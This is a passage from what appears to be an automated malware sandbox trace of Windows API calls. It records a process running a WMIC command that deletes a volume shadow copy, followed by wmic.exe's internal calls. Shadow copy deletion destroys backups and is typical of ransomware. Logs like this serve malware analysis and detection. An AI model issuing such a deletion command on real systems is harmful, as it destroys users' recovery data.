\"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ee20 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete", lpProcessInformation=0x28ee20*(hProcess=0x54, hThread=0x50, dwProcessId=0x710, dwThreadId=0x7ec)) returned 1 [0121.390] CloseHandle (hObject=0x50) returned 1 [0121.390] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0121.390] GetProcessHeap () returned 0x460000 [0121.390] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47c360 | out: hHeap=0x460000) returned 1 [0121.390] GetEnvironmentStringsW () returned 0x47ad60* [0121.390] GetProcessHeap () returned 0x460000 [0121.390] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xae8) returned 0x47b850 [0121.390] FreeEnvironmentStringsW (penv=0x47ad60) returned 1 [0121.390] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0122.651] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x28ed68 | out: lpExitCode=0x28ed68*=0x0) returned 1 [0122.651] CloseHandle (hObject=0x54) returned 1 [0122.651] _vsnwprintf (in: _Buffer=0x28efd8, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ed78 | out: _Buffer="00000000") returned 8 [0122.651] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0122.651] GetProcessHeap () returned 0x460000 [0122.651] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47b850 | out: hHeap=0x460000) returned 1 [0122.651] GetEnvironmentStringsW () returned 0x47ad60* [0122.651] GetProcessHeap () returned 0x460000 [0122.651] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0e) returned 0x47b880 [0122.651] FreeEnvironmentStringsW (penv=0x47ad60) returned 1 [0122.651] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0122.651] GetProcessHeap () returned 0x460000 [0122.651] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47b880 | out: hHeap=0x460000) returned 1 [0122.651] GetEnvironmentStringsW () returned 0x47ad60* [0122.652] GetProcessHeap () returned 0x460000 [0122.652] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0e) returned 0x47b880 [0122.652] FreeEnvironmentStringsW (penv=0x47ad60) returned 1 [0122.652] GetProcessHeap () returned 0x460000 [0122.652] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x478a30 | out: hHeap=0x460000) returned 1 [0122.652] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ee38 | out: lpAttributeList=0x28ee38) [0122.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0122.652] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0122.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0122.652] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a88e194 | out: lpMode=0x4a88e194) returned 1 [0122.652] _get_osfhandle (_FileHandle=0) returned 0x3 [0122.652] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a88e198 | out: lpMode=0x4a88e198) returned 1 [0122.652] SetConsoleInputExeNameW () returned 0x1 [0122.652] GetConsoleOutputCP () returned 0x1b5 [0122.653] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a89bfe0 | out: lpCPInfo=0x4a89bfe0) returned 1 [0122.653] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0122.653] exit (_Code=0) Process: id = "47" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x23a8d000" os_pid = "0x710" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "46" os_parent_pid = "0xb0c" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 245 os_tid = 0x7ec [0121.434] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fa90 | out: lpSystemTimeAsFileTime=0x12fa90*(dwLowDateTime=0x4fd05d10, dwHighDateTime=0x1d68245)) [0121.434] GetCurrentProcessId () returned 0x710 [0121.434] GetCurrentThreadId () returned 0x7ec [0121.434] GetTickCount () returned 0x1153e0a [0121.434] QueryPerformanceCounter (in: lpPerformanceCount=0x12fa98 | out: lpPerformanceCount=0x12fa98*=24132691973) returned 1 [0121.434] GetModuleHandleW (lpModuleName=0x0) returned 0xffc80000 [0121.434] __set_app_type (_Type=0x1) [0121.434] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffccced0) returned 0x0 [0121.434] __wgetmainargs (in: _Argc=0xffcf2380, _Argv=0xffcf2390, _Env=0xffcf2388, _DoWildCard=0, _StartInfo=0xffcf239c | out: _Argc=0xffcf2380, _Argv=0xffcf2390, _Env=0xffcf2388) returned 0 [0121.435] ??0CHString@@QEAA@XZ () returned 0xffcf2ab0 [0121.435] malloc (_Size=0x30) returned 0x4b5a50 [0121.435] malloc (_Size=0x70) returned 0x4b5a90 [0121.435] malloc (_Size=0x50) returned 0x4b7d30 [0121.435] malloc (_Size=0x30) returned 0x4b7d90 [0121.435] malloc (_Size=0x48) returned 0x4b7dd0 [0121.435] malloc (_Size=0x30) returned 0x4b7e20 [0121.435] malloc (_Size=0x30) returned 0x4b7e60 [0121.435] ??0CHString@@QEAA@XZ () returned 0xffcf2f58 [0121.435] malloc (_Size=0x30) returned 0x4b7ea0 [0121.435] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0121.435] SetConsoleCtrlHandler (HandlerRoutine=0xffcc5724, Add=1) returned 1 [0121.435] _onexit (_Func=0xffcdf378) returned 0xffcdf378 [0121.435] _onexit (_Func=0xffcdf490) returned 0xffcdf490 [0121.435] _onexit (_Func=0xffcdf4d0) returned 0xffcdf4d0 [0121.436] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0121.436] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0121.439] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0121.448] CoCreateInstance (in: rclsid=0xffc873a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffc87370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffcf2940 | out: ppv=0xffcf2940*=0x1f1390) returned 0x0 [0121.456] GetCurrentProcess () returned 0xffffffffffffffff [0121.456] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x12f860 | out: TokenHandle=0x12f860*=0xf4) returned 1 [0121.456] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12f858 | out: TokenInformation=0x0, ReturnLength=0x12f858) returned 0 [0121.456] malloc (_Size=0x118) returned 0x4b69a0 [0121.456] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x4b69a0, TokenInformationLength=0x118, ReturnLength=0x12f858 | out: TokenInformation=0x4b69a0, ReturnLength=0x12f858) returned 1 [0121.456] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x4b69a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1320723340, Attributes=0xb764), (Luid.LowPart=0x0, Luid.HighPart=4947680, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.456] free (_Block=0x4b69a0) [0121.456] CloseHandle (hObject=0xf4) returned 1 [0121.456] malloc (_Size=0x40) returned 0x4b7ee0 [0121.456] malloc (_Size=0x40) returned 0x4b7f30 [0121.456] malloc (_Size=0x40) returned 0x4b7f80 [0121.456] malloc (_Size=0x20a) returned 0x4b69a0 [0121.456] GetSystemDirectoryW (in: lpBuffer=0x4b69a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0121.457] free (_Block=0x4b69a0) [0121.457] malloc (_Size=0x18) returned 0x37dfb0 [0121.457] malloc (_Size=0x18) returned 0x4b69a0 [0121.457] malloc (_Size=0x18) returned 0x4b69c0 [0121.457] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0121.457] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0121.457] free (_Block=0x37dfb0) [0121.457] free (_Block=0x4b69a0) [0121.457] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0121.457] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0121.457] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0121.458] FreeLibrary (hLibModule=0x77940000) returned 1 [0121.458] free (_Block=0x4b69c0) [0121.458] _vsnwprintf (in: _Buffer=0x4b7f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x12f488 | out: _Buffer="ms_409") returned 6 [0121.458] malloc (_Size=0x20) returned 0x4b69a0 [0121.458] GetComputerNameW (in: lpBuffer=0x4b69a0, nSize=0x12f860 | out: lpBuffer="XDUWTFONO", nSize=0x12f860) returned 1 [0121.458] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.458] malloc (_Size=0x14) returned 0x37dfb0 [0121.458] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.459] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x12f858 | out: lpNameBuffer=0x0, nSize=0x12f858) returned 0x7fffffde000 [0121.459] GetLastError () returned 0xea [0121.459] malloc (_Size=0x40) returned 0x4b69d0 [0121.460] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x4b69d0, nSize=0x12f858 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12f858) returned 0x1 [0121.460] lstrlenW (lpString="") returned 0 [0121.460] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.460] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0121.461] lstrlenW (lpString=".") returned 1 [0121.461] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.461] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0121.461] lstrlenW (lpString="LOCALHOST") returned 9 [0121.461] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.461] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0121.461] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.461] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.461] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0121.461] free (_Block=0x37dfb0) [0121.461] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.461] malloc (_Size=0x14) returned 0x37dfb0 [0121.461] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.461] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.461] malloc (_Size=0x14) returned 0x4b6a20 [0121.461] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.462] malloc (_Size=0x8) returned 0x4b6a40 [0121.462] malloc (_Size=0x18) returned 0x4b6a60 [0121.462] malloc (_Size=0x30) returned 0x4b6a80 [0121.462] malloc (_Size=0x18) returned 0x4b6ac0 [0121.462] SysStringLen (param_1="IDENTIFY") returned 0x8 [0121.462] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0121.462] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0121.462] SysStringLen (param_1="IDENTIFY") returned 0x8 [0121.462] malloc (_Size=0x30) returned 0x4b6ae0 [0121.462] malloc (_Size=0x18) returned 0x4b6b20 [0121.462] SysStringLen (param_1="IMPERSONATE") returned 0xb [0121.462] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0121.462] SysStringLen (param_1="IMPERSONATE") returned 0xb [0121.462] SysStringLen (param_1="IDENTIFY") returned 0x8 [0121.462] SysStringLen (param_1="IDENTIFY") returned 0x8 [0121.462] SysStringLen (param_1="IMPERSONATE") returned 0xb [0121.462] malloc (_Size=0x30) returned 0x4b6b40 [0121.462] malloc (_Size=0x18) returned 0x4b6b80 [0121.462] SysStringLen (param_1="DELEGATE") returned 0x8 [0121.462] SysStringLen (param_1="IDENTIFY") returned 0x8 [0121.462] SysStringLen (param_1="DELEGATE") returned 0x8 [0121.462] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0121.462] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0121.462] SysStringLen (param_1="DELEGATE") returned 0x8 [0121.462] malloc (_Size=0x30) returned 0x4b6ba0 [0121.462] malloc (_Size=0x18) returned 0x4b6be0 [0121.462] malloc (_Size=0x30) returned 0x4b6c00 [0121.462] malloc (_Size=0x18) returned 0x4b6c40 [0121.462] SysStringLen (param_1="NONE") returned 0x4 [0121.463] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.463] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.463] SysStringLen (param_1="NONE") returned 0x4 [0121.463] malloc (_Size=0x30) returned 0x4b6c60 [0121.463] malloc (_Size=0x18) returned 0x4b6ca0 [0121.463] SysStringLen (param_1="CONNECT") returned 0x7 [0121.463] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.463] malloc (_Size=0x30) returned 0x4b6cc0 [0121.463] malloc (_Size=0x18) returned 0x4b6d00 [0121.463] SysStringLen (param_1="CALL") returned 0x4 [0121.463] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.463] SysStringLen (param_1="CALL") returned 0x4 [0121.463] SysStringLen (param_1="CONNECT") returned 0x7 [0121.463] malloc (_Size=0x30) returned 0x4b6d20 [0121.463] malloc (_Size=0x18) returned 0x4b6d60 [0121.463] SysStringLen (param_1="PKT") returned 0x3 [0121.463] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.463] SysStringLen (param_1="PKT") returned 0x3 [0121.463] SysStringLen (param_1="NONE") returned 0x4 [0121.463] SysStringLen (param_1="NONE") returned 0x4 [0121.463] SysStringLen (param_1="PKT") returned 0x3 [0121.463] malloc (_Size=0x30) returned 0x4b6d80 [0121.463] malloc (_Size=0x18) returned 0x4b6dc0 [0121.463] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0121.463] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.463] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0121.463] SysStringLen (param_1="NONE") returned 0x4 [0121.463] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0121.463] SysStringLen (param_1="PKT") returned 0x3 [0121.463] SysStringLen (param_1="PKT") returned 0x3 [0121.463] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0121.463] malloc (_Size=0x30) returned 0x4b8000 [0121.464] malloc (_Size=0x18) returned 0x4b6de0 [0121.464] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0121.464] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.464] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0121.464] SysStringLen (param_1="PKT") returned 0x3 [0121.464] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0121.464] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0121.464] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0121.464] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0121.464] malloc (_Size=0x30) returned 0x4b8040 [0121.464] malloc (_Size=0x40) returned 0x4b6e00 [0121.465] malloc (_Size=0x20a) returned 0x4b6e50 [0121.465] GetSystemDirectoryW (in: lpBuffer=0x4b6e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0121.465] free (_Block=0x4b6e50) [0121.465] malloc (_Size=0x18) returned 0x4b6e50 [0121.465] malloc (_Size=0x18) returned 0x4b6e70 [0121.465] malloc (_Size=0x18) returned 0x4b6e90 [0121.465] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0121.465] SysStringLen (param_1="\\wbem\\") returned 0x6 [0121.465] free (_Block=0x4b6e50) [0121.465] free (_Block=0x4b6e70) [0121.465] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0121.465] free (_Block=0x4b6e90) [0121.465] malloc (_Size=0x18) returned 0x4b6e50 [0121.465] malloc (_Size=0x18) returned 0x4b6e70 [0121.465] malloc (_Size=0x18) returned 0x4b6e90 [0121.465] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0121.465] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0121.465] free (_Block=0x4b6e50) [0121.466] free (_Block=0x4b6e70) [0121.466] GetCurrentThreadId () returned 0x7ec [0121.466] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x12f160 | out: phkResult=0x12f160*=0xf8) returned 0x0 [0121.466] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x12f1b0, lpcbData=0x12f150*=0x400 | out: lpType=0x0, lpData=0x12f1b0*=0x30, lpcbData=0x12f150*=0x4) returned 0x0 [0121.466] _wcsicmp (_String1="0", _String2="1") returned -1 [0121.466] _wcsicmp (_String1="0", _String2="2") returned -2 [0121.466] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x12f150*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x12f150*=0x42) returned 0x0 [0121.466] malloc (_Size=0x86) returned 0x4b6eb0 [0121.466] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x4b6eb0, lpcbData=0x12f150*=0x42 | out: lpType=0x0, lpData=0x4b6eb0*=0x25, lpcbData=0x12f150*=0x42) returned 0x0 [0121.466] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0121.466] malloc (_Size=0x42) returned 0x4b6f40 [0121.466] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0121.466] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x12f1b0, lpcbData=0x12f150*=0x400 | out: lpType=0x0, lpData=0x12f1b0*=0x36, lpcbData=0x12f150*=0xc) returned 0x0 [0121.466] _wtol (_String="65536") returned 65536 [0121.466] free (_Block=0x4b6eb0) [0121.466] RegCloseKey (hKey=0x0) returned 0x6 [0121.466] CoCreateInstance (in: rclsid=0xffc87410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffc873f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x12f658 | out: ppv=0x12f658*=0x20671d0) returned 0x0 [0121.485] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x20671d0, xmlSource=0x12f7a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x4b6e50), isSuccessful=0x12f810 | out: isSuccessful=0x12f810*=0xffff) returned 0x0 [0121.595] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x20671d0, DOMElement=0x12f650 | out: DOMElement=0x12f650) returned 0x0 [0121.595] malloc (_Size=0x18) returned 0x4b6e50 [0121.596] free (_Block=0x4b6e50) [0121.596] malloc (_Size=0x18) returned 0x4b6e50 [0121.596] free (_Block=0x4b6e50) [0121.596] malloc (_Size=0x18) returned 0x4b6e50 [0121.596] malloc (_Size=0x18) returned 0x4b6e70 [0121.596] malloc (_Size=0x30) returned 0x4b8080 [0121.597] malloc (_Size=0x18) returned 0x4b6eb0 [0121.597] free (_Block=0x4b6eb0) [0121.597] malloc (_Size=0x18) returned 0x4bc560 [0121.597] malloc (_Size=0x18) returned 0x4bc580 [0121.597] SysStringLen (param_1="VALUE") returned 0x5 [0121.597] SysStringLen (param_1="TABLE") returned 0x5 [0121.597] SysStringLen (param_1="TABLE") returned 0x5 [0121.597] SysStringLen (param_1="VALUE") returned 0x5 [0121.597] malloc (_Size=0x30) returned 0x4b80c0 [0121.598] malloc (_Size=0x18) returned 0x4bc5a0 [0121.598] free (_Block=0x4bc5a0) [0121.598] malloc (_Size=0x18) returned 0x4bc5a0 [0121.598] malloc (_Size=0x18) returned 0x4bc5c0 [0121.598] SysStringLen (param_1="LIST") returned 0x4 [0121.598] SysStringLen (param_1="TABLE") returned 0x5 [0121.598] malloc (_Size=0x30) returned 0x4b8100 [0121.598] malloc (_Size=0x18) returned 0x4bc5e0 [0121.599] free (_Block=0x4bc5e0) [0121.599] malloc (_Size=0x18) returned 0x4bc5e0 [0121.599] malloc (_Size=0x18) returned 0x4bc600 [0121.599] SysStringLen (param_1="RAWXML") returned 0x6 [0121.599] SysStringLen (param_1="TABLE") returned 0x5 [0121.599] SysStringLen (param_1="RAWXML") returned 0x6 [0121.599] SysStringLen (param_1="LIST") returned 0x4 [0121.599] SysStringLen (param_1="LIST") returned 0x4 [0121.599] SysStringLen (param_1="RAWXML") returned 0x6 [0121.599] malloc (_Size=0x30) returned 0x4b8140 [0121.599] malloc (_Size=0x18) returned 0x4bc620 [0121.599] free (_Block=0x4bc620) [0121.600] malloc (_Size=0x18) returned 0x4bc620 [0121.600] malloc (_Size=0x18) returned 0x4bc640 [0121.600] SysStringLen (param_1="HTABLE") returned 0x6 [0121.600] SysStringLen (param_1="TABLE") returned 0x5 [0121.600] SysStringLen (param_1="HTABLE") returned 0x6 [0121.600] SysStringLen (param_1="LIST") returned 0x4 [0121.600] malloc (_Size=0x30) returned 0x4b8180 [0121.600] malloc (_Size=0x18) returned 0x4bc660 [0121.600] free (_Block=0x4bc660) [0121.600] malloc (_Size=0x18) returned 0x4bc660 [0121.600] malloc (_Size=0x18) returned 0x4bc680 [0121.600] SysStringLen (param_1="HFORM") returned 0x5 [0121.600] SysStringLen (param_1="TABLE") returned 0x5 [0121.601] SysStringLen (param_1="HFORM") returned 0x5 [0121.601] SysStringLen (param_1="LIST") returned 0x4 [0121.601] SysStringLen (param_1="HFORM") returned 0x5 [0121.601] SysStringLen (param_1="HTABLE") returned 0x6 [0121.601] malloc (_Size=0x30) returned 0x4b81c0 [0121.601] malloc (_Size=0x18) returned 0x4bc6a0 [0121.601] free (_Block=0x4bc6a0) [0121.601] malloc (_Size=0x18) returned 0x4bc6a0 [0121.601] malloc (_Size=0x18) returned 0x4bc6c0 [0121.601] SysStringLen (param_1="XML") returned 0x3 [0121.601] SysStringLen (param_1="TABLE") returned 0x5 [0121.601] SysStringLen (param_1="XML") returned 0x3 [0121.601] SysStringLen (param_1="VALUE") returned 0x5 [0121.601] SysStringLen (param_1="VALUE") returned 0x5 [0121.602] SysStringLen (param_1="XML") returned 0x3 [0121.602] malloc (_Size=0x30) returned 0x4b8200 [0121.602] malloc (_Size=0x18) returned 0x4bc6e0 [0121.602] free (_Block=0x4bc6e0) [0121.602] malloc (_Size=0x18) returned 0x4bc6e0 [0121.602] malloc (_Size=0x18) returned 0x4bc700 [0121.602] SysStringLen (param_1="MOF") returned 0x3 [0121.602] SysStringLen (param_1="TABLE") returned 0x5 [0121.602] SysStringLen (param_1="MOF") returned 0x3 [0121.602] SysStringLen (param_1="LIST") returned 0x4 [0121.602] SysStringLen (param_1="MOF") returned 0x3 [0121.602] SysStringLen (param_1="RAWXML") returned 0x6 [0121.602] SysStringLen (param_1="LIST") returned 0x4 [0121.602] SysStringLen (param_1="MOF") returned 0x3 [0121.602] malloc (_Size=0x30) returned 0x4b8240 [0121.603] malloc (_Size=0x18) returned 0x4bc720 [0121.603] free (_Block=0x4bc720) [0121.603] malloc (_Size=0x18) returned 0x4bc720 [0121.603] malloc (_Size=0x18) returned 0x4bc740 [0121.603] SysStringLen (param_1="CSV") returned 0x3 [0121.603] SysStringLen (param_1="TABLE") returned 0x5 [0121.603] SysStringLen (param_1="CSV") returned 0x3 [0121.603] SysStringLen (param_1="LIST") returned 0x4 [0121.603] SysStringLen (param_1="CSV") returned 0x3 [0121.603] SysStringLen (param_1="HTABLE") returned 0x6 [0121.603] SysStringLen (param_1="CSV") returned 0x3 [0121.603] SysStringLen (param_1="HFORM") returned 0x5 [0121.603] malloc (_Size=0x30) returned 0x4b8280 [0121.604] malloc (_Size=0x18) returned 0x4bc760 [0121.604] free (_Block=0x4bc760) [0121.604] malloc (_Size=0x18) returned 0x4bc760 [0121.604] malloc (_Size=0x18) returned 0x4bc780 [0121.604] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.604] SysStringLen (param_1="TABLE") returned 0x5 [0121.604] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.604] SysStringLen (param_1="VALUE") returned 0x5 [0121.604] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.604] SysStringLen (param_1="XML") returned 0x3 [0121.604] SysStringLen (param_1="XML") returned 0x3 [0121.604] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.604] malloc (_Size=0x30) returned 0x4b82c0 [0121.605] malloc (_Size=0x18) returned 0x4bc7a0 [0121.605] free (_Block=0x4bc7a0) [0121.605] malloc (_Size=0x18) returned 0x4bc7a0 [0121.605] malloc (_Size=0x18) returned 0x4bc7c0 [0121.605] SysStringLen (param_1="texttablewsys") returned 0xd [0121.605] SysStringLen (param_1="TABLE") returned 0x5 [0121.605] SysStringLen (param_1="texttablewsys") returned 0xd [0121.605] SysStringLen (param_1="XML") returned 0x3 [0121.605] SysStringLen (param_1="texttablewsys") returned 0xd [0121.605] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.605] SysStringLen (param_1="XML") returned 0x3 [0121.605] SysStringLen (param_1="texttablewsys") returned 0xd [0121.605] malloc (_Size=0x30) returned 0x4b8300 [0121.606] malloc (_Size=0x18) returned 0x4bc7e0 [0121.606] free 